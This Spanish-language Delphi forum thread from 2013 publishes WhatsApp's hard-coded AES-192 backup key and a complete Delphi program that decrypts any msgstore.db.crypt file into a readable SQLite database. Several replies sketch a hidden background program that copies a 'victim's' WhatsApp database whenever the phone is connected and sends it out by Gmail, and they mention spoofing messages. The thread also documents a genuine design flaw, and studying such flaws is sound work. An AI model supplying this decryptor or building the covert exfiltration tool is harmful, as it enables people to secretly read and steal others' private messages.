Ir al contenido



Foto

Descifrar base de datos de WhatsApp


  • Por favor identifícate para responder
11 respuestas en este tema

#1 seoane

seoane

    Advanced Member

  • Administrador
  • 1.254 mensajes
  • LocationEspaña

Escrito 04 febrero 2013 - 04:37

Esto ya es viejo, y por internet encontrareis como hacerlo usando diferentes herramientas, pero aquí dejo como hacerlo con delphi  ... y ademas me sirve como ejemplo de mi librería SeCrypt a la que le añadido la opción de usar claves de 128 y 192 bits, que ahora nos viene como anillo al dedo.

https://code.google.com/p/secrypt/

La base de datos de mensajes de WhatsApp se guarda en un fichero en  formato SQLite. En el caso de los teléfonos IOS este fichero está en la ruta: [ID de App]/Documents/ChatStorage.sqlite y en el caso de los teléfonos Android en: /com.whatsapp/databases/msgstore.db. Este fichero está sin cifrar tal y requiere que el teléfono este jailbreakedo para acceder a el.

En el caso de Android además existe un fichero de backup que se almacena  en la tarjeta externa de memoria y que tampoco estaba cifrado. Esto cambió en una de las actualizaciones que sufrió la aplicación. De esta forma si se pierde el teléfono o lo roban, aunque tengan la tarjeta no podrán leer los mensajes.

Por desgracia, el cifrado que utiliza la aplicación (AES-192-ECB) en el fichero de backup siempre la hace usando la misma key (346a23652a46392b4d73257c67317e352e3372482177652c), y ningún factor único de cada dispositivo, por lo que se pueden recuperar los mensajes de cualquier móvil de la misma forma y en pocos segundos.


Pues con el siguiente programa solo tienes que arrastrar ese fichero de backup que se encuentra en la tarjeta  (tendrá un nombre parecido a msgstore.db.crypt) encima de el y lo descifrara creando una copia con el mismo nombre añadiendo ".dec" al final. El fichero descifrado no es mas que una base de datos SQLite así que con un simple editor de texto podremos echarle un vistazo a los mensajes, o si queremos ver todos los campos podemos usar el manager del SQLite

A divertirse!!!  ;)

El código del programa (incluido en el .zip junto al ejecutable):


delphi
  1. program WhatsAppDec;
  2.  
  3. uses
  4.   Windows,
  5.   SysUtils,
  6.   SeAES256 in 'SeAES256.pas';
  7.  
  8. var
  9.   Src, Dst: File of TAESState;
  10.   AESKey: TAESKey;
  11.   ExpandedKey: TAESExpandedKey;
  12.   State: TAESState;
  13. begin
  14.   if ParamCount = 0 then
  15.     Exit;
  16.   AssignFile(Src,ParamStr(1));
  17.   AssignFile(Dst,ParamStr(1) + '.dec');
  18.   {$I-}
  19.     Reset(Src);
  20.   {$I+}
  21.   if IOResult = 0 then
  22.   try
  23.     {$I-}
  24.       Rewrite(Dst);
  25.     {$I+}
  26.     if IOResult = 0 then
  27.     try
  28.       AESCopyKey(AESKey,
  29.         PAnsiChar(#$34#$6a#$23#$65#$2a#$46#$39#$2b#$4d#$73#$25#$7c +
  30.                   #$67#$31#$7e#$35#$2e#$33#$72#$48#$21#$77#$65#$2c),192);
  31.       AESExpandKey(ExpandedKey,AESKey,192);
  32.       Read(Src,State);
  33.       while not EOF(Src) do
  34.       begin
  35.         AESDecrypt(State,ExpandedKey);
  36.         Write(Dst,State);
  37.         Read(Src,State);
  38.       end;
  39.     finally
  40.       CloseFile(Dst);
  41.     end;
  42.   finally
  43.     CloseFile(Src);
  44.   end;
  45. end.

Archivos adjuntos


  • 0

#2 egostar

egostar

    missing my father, I love my mother.

  • Administrador
  • 14.111 mensajes
  • LocationMéxico

Escrito 04 febrero 2013 - 09:41

Caramba!!!!

Siempre dando tentaciones amigo Domingo :D :D :D

Saludos
  • 0

#3 seoane

seoane

    Advanced Member

  • Administrador
  • 1.254 mensajes
  • LocationEspaña

Escrito 04 febrero 2013 - 10:51

Siempre dando tentaciones amigo Domingo :D :D :D


Menos mal que ninguno de nosotros es un novio celoso  *-) *-) *-)
  • 0

#4 ELKurgan

ELKurgan

    Advanced Member

  • Miembro Platino
  • PipPipPip
  • 551 mensajes
  • LocationEspaña

Escrito 05 febrero 2013 - 03:31

Muchas gracias por el aporte, maestro  (y)
  • 0

#5 Sergio

Sergio

    Advanced Member

  • Moderadores
  • PipPipPip
  • 1.092 mensajes
  • LocationMurcia, España

Escrito 05 febrero 2013 - 05:18

Flipo con Whatsap, es de lo mas inseguro que existe, y van y cifran los ficheros con una llave conocida por todos... en fin, que seran "de letras" los programadores, digo yo.

La verdad, se puede hacer un programita que lea esos mensajes y te los reenvie a tu gmail, asi ves los whatsap en tu PC, aunque no podrias responder... ¿o si añades lineas al fichero se envian? ya sería fuerte, pero oye, todo es probar  *-)
  • 0

#6 seoane

seoane

    Advanced Member

  • Administrador
  • 1.254 mensajes
  • LocationEspaña

Escrito 05 febrero 2013 - 05:41

La verdad, se puede hacer un programita que lea esos mensajes y te los reenvie a tu gmail, asi ves los whatsap en tu PC, aunque no podrias responder... ¿o si añades lineas al fichero se envian? ya sería fuerte, pero oye, todo es probar  *-)


Se puede hacer un programa que se quede en segundo plano y que cada vez que la victima  :D conecte el móvil al ordenador, por ejmplo para descargar fotos, el programa descargue el fichero de WhatsApp y nos lo envié por gmail. Sería bastante sencillo  *-)

Lo de enviar lineas ya es mas complicado, ya que se trata de un "historial" no de conversaciones en tiempo real lo que se guardan en ese fichero. Pero por otro lado en el enlace que puse mas arriba, se dedican a sacarle los colores a whatsApp casi todos los días, un dia se descargan todas las fotos de perfil de los usuarios (a nivel nacional), otro se sacan una lista con los números de móvil, por no hablar de que explican una forma de enviar mensajes suplantando ser otra persona si se conoces algunos datos del teléfono donde esta instalado el whatsApp.

Al final vas a tener razón y los encargados de la seguridad en esa empresa son "de letras"
  • 0

#7 Sergio

Sergio

    Advanced Member

  • Moderadores
  • PipPipPip
  • 1.092 mensajes
  • LocationMurcia, España

Escrito 05 febrero 2013 - 06:14


La verdad, se puede hacer un programita que lea esos mensajes y te los reenvie a tu gmail, asi ves los whatsap en tu PC, aunque no podrias responder... ¿o si añades lineas al fichero se envian? ya sería fuerte, pero oye, todo es probar  *-)


Se puede hacer un programa que se quede en segundo plano y que cada vez que la victima  :D conecte el móvil al ordenador, por ejmplo para descargar fotos, el programa descargue el fichero de WhatsApp y nos lo envié por gmail. Sería bastante sencillo  *-)

Lo de enviar lineas ya es mas complicado, ya que se trata de un "historial" no de conversaciones en tiempo real lo que se guardan en ese fichero. Pero por otro lado en el enlace que puse mas arriba, se dedican a sacarle los colores a whatsApp casi todos los días, un dia se descargan todas las fotos de perfil de los usuarios (a nivel nacional), otro se sacan una lista con los números de móvil, por no hablar de que explican una forma de enviar mensajes suplantando ser otra persona si se conoces algunos datos del teléfono donde esta instalado el whatsApp.

Al final vas a tener razón y los encargados de la seguridad en esa empresa son "de letras"


Pensaba más en una app android que vigile ese fichero y reporte lineas nuevas a... gmail, gtalk, line... lo que quieras, vamos, así dejas el movil en el cajón y recibes los whasap en tu PC, por ejemplo.
  • 0

#8 cadetill

cadetill

    Advanced Member

  • Moderadores
  • PipPipPip
  • 994 mensajes
  • LocationEspaña

Escrito 05 febrero 2013 - 07:52

Vaya tela con el guasap :D
  • 0

#9 egostar

egostar

    missing my father, I love my mother.

  • Administrador
  • 14.111 mensajes
  • LocationMéxico

Escrito 05 febrero 2013 - 08:46

Al final vas a tener razón y los encargados de la seguridad en esa empresa son "de letras"


Y no será "intencional", digo, sacar las fotos de tu perfil pueder ser un negocio muy rentable, y más si se encuentran con una celebridad, ¿ no ?

El punto es que se manejaría como un bug y no como algo mal intencionado, yo soy muy mal pensado.....  (h)

Saludos
  • 0

#10 seoane

seoane

    Advanced Member

  • Administrador
  • 1.254 mensajes
  • LocationEspaña

Escrito 05 febrero 2013 - 08:52

Pensaba más en una app android que vigile ese fichero y reporte lineas nuevas a... gmail, gtalk, line... lo que quieras, vamos, así dejas el movil en el cajón y recibes los whasap en tu PC, por ejemplo.

Dice un antiguo proverbio que el que solo tiene un martillo ve clavos en todos lados. Es lo que me pasa con delphi (mi martillo) que todo lo quiero llevar a aplicaciones de escritorio para windows. Voy a tener que reciclarme tarde o temprano  y empezar a ver otra cosa mas que clavos  :D
  • 0

#11 joaquipardo

joaquipardo

    Member

  • Miembros
  • PipPip
  • 37 mensajes
  • LocationAsunción - Paraguay

Escrito 05 marzo 2015 - 08:32

Sres.
        Alguien pudo enviar un mensaje desde su Delphi que no sea desde el celular a la red Whatsapp ????

        Esto sería desde el Win32, y creo que utiliza el protocolo Xmpp.

        Saludos y en espera de alguna respuesta.
  • 0

#12 genriquez

genriquez

    Advanced Member

  • Miembro Platino
  • PipPipPip
  • 526 mensajes
  • LocationCali, Colombia

Escrito 06 marzo 2015 - 06:32

Lo de la seguridad puede que comenzase como una falencia del programa, pero luego con la compra por parte de Facebook, tiene otro tinte.

Aquí les dejo un video donde se ven las verdaderas intenciones.



Saludos


  • 0